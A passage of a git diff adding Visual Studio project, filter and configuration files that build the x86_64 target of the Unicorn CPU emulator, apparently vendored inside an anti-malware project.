<ClCompile Include="..\..\..\qemu\util\oslib-win32.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\qemu-error.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\qemu-thread-win32.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\qemu-timer-common.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\uc.c" /> + <ClCompile Include="..\qapi-visit.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\qapi-types.c"> + <Filter>qemu</Filter> + </ClCompile> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\include\list.h"> + <Filter>priv</Filter> + </ClInclude> + <ClInclude Include="..\..\..\include\qemu.h"> + <Filter>priv</Filter> + </ClInclude> + <ClInclude Include="..\..\..\include\uc_priv.h"> + <Filter>priv</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\vl.h"> + <Filter>qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\config.h"> + <Filter>qemu\include</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\elf.h"> + <Filter>qemu\include</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\glib_compat.h"> + <Filter>qemu\include</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu-common.h"> + <Filter>qemu\include</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\address-spaces.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-all.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-common.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-defs.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu_ldst.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu_ldst_template.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cputlb.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\exec-all.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\gen-icount.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\helper-gen.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\helper-head.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\helper-proto.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\helper-tcg.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\hwaddr.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\ioport.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\memory-internal.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\memory.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\poison.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\ram_addr.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\softmmu-semi.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\spinlock.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\fpu\softfloat.h"> + <Filter>qemu\include\fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\boards.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\hw.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\irq.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\qdev-core.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\qdev.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\arm\arm.h"> + <Filter>qemu\include\hw\arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\cpu\icc_bus.h"> + <Filter>qemu\include\hw\cpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\i386\apic.h"> + <Filter>qemu\include\hw\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\i386\apic_internal.h"> + <Filter>qemu\include\hw\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\i386\pc.h"> + <Filter>qemu\include\hw\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\m68k\m68k.h"> + <Filter>qemu\include\hw\m68k</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\m68k\mcf.h"> + <Filter>qemu\include\hw\m68k</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\mips\bios.h"> + <Filter>qemu\include\hw\mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\mips\cpudevs.h"> + <Filter>qemu\include\hw\mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\mips\mips.h"> + <Filter>qemu\include\hw\mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\grlib.h"> + <Filter>qemu\include\hw\sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sparc.h"> + <Filter>qemu\include\hw\sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sparc32_dma.h"> + <Filter>qemu\include\hw\sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sun4m.h"> + <Filter>qemu\include\hw\sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\dealloc-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\error.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\opts-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp-input-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp-output-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\string-input-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\visitor-impl.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qbool.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qdict.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qerror.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qfloat.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qint.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qjson.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qlist.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qobject.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qstring.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\types.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\aes.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\atomic.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\bitmap.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\bitops.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\bswap.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\compiler.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\crc32c.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\host-utils.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\int128.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\log.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\module.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\notify.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\osdep.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\queue.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\range.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\thread-posix.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\thread-win32.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\thread.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\timer.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\typedefs.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qom\cpu.h"> + <Filter>qemu\include\qom</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qom\object.h"> + <Filter>qemu\include\qom</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qom\qom-qobject.h"> + <Filter>qemu\include\qom</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\accel.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\cpus.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\memory_mapping.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\os-win32.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\sysemu.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\include\unicorn\arm.h" /> + <ClInclude Include="..\..\..\include\unicorn\arm64.h" /> + <ClInclude Include="..\..\..\include\unicorn\m68k.h" /> + <ClInclude Include="..\..\..\include\unicorn\mips.h" /> + <ClInclude Include="..\..\..\include\unicorn\sparc.h" /> + <ClInclude Include="..\..\..\include\unicorn\unicorn.h" /> + <ClInclude Include="..\..\..\include\unicorn\x86.h" /> + <ClInclude Include="..\..\..\include\unicorn\platform.h" /> + <ClInclude Include="..\config-host.h"> + <Filter>qemu</Filter> + </ClInclude> + <ClInclude Include="..\qapi-visit.h"> + <Filter>qemu</Filter> + </ClInclude> + <ClInclude Include="..\qapi-types.h"> + <Filter>qemu</Filter> + </ClInclude> + </ItemGroup> + <ItemGroup> + <MASM Include="..\..\..\qemu\util\setjmp-wrapper-win32.asm" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/config-target.h new file mode 100644 index 0000000..3edfc5d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/config-target.h @@ -0,0 +1,5 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_X86_64 1 +#define TARGET_NAME "x86_64" +#define TARGET_I386 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/x86_64-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/x86_64-softmmu.vcxproj new file mode 100644 index 0000000..b8c471e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/x86_64-softmmu.vcxproj @@ -0,0 +1,243 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\cc_helper_template.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\ops_sse.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\ops_sse_header.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\shift_helper_template.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\svm.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\topology.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\x86_64.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\i386\pc.c" /> + <ClCompile Include="..\..\..\qemu\hw\i386\pc_piix.c" /> + <ClCompile Include="..\..\..\qemu\hw\intc\apic.c" /> + <ClCompile Include="..\..\..\qemu\hw\intc\apic_common.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\arch_memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\cc_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\excp_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\fpu_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\int_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\mem_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\misc_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\seg_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\smm_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\svm_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\unicorn.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{17077E86-AE7C-41AF-86ED-2BAC03B019BC}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>x86_64softmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-i386;../../../include</AdditionalIncludeDirectories> + <ForcedIncludeFiles>x86_64.h</ForcedIncludeFiles> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <ExceptionHandling>false</ExceptionHandling> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-i386;../../../include</AdditionalIncludeDirectories> + <ForcedIncludeFiles>x86_64.h</ForcedIncludeFiles> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-i386;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>x86_64.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-i386;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>x86_64.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/x86_64-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/x86_64-softmmu.vcxproj.filters new file mode 100644 index 0000000..2ee64ce --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/x86_64-softmmu.vcxproj.filters @@ -0,0 +1,164 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{db59a62f-c036-40c3-9dd8-8b30c9f06415}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{42fe7224-78f7-45a5-a173-9ed3bdeb1985}</UniqueIdentifier> + </Filter> + <Filter Include="hw\i386"> + <UniqueIdentifier>{f33c9635-4286-435a-ab9c-3f2f245ce7f9}</UniqueIdentifier> + </Filter> + <Filter Include="hw\intc"> + <UniqueIdentifier>{afdb0084-499f-46ea-97a2-6920a8f64800}</UniqueIdentifier> + </Filter> + <Filter Include="target-i386"> + <UniqueIdentifier>{dc6b560b-40ea-47a1-91f1-50718313849f}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{d3a1fd5b-09b0-4896-af49-5b3668f03a72}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + 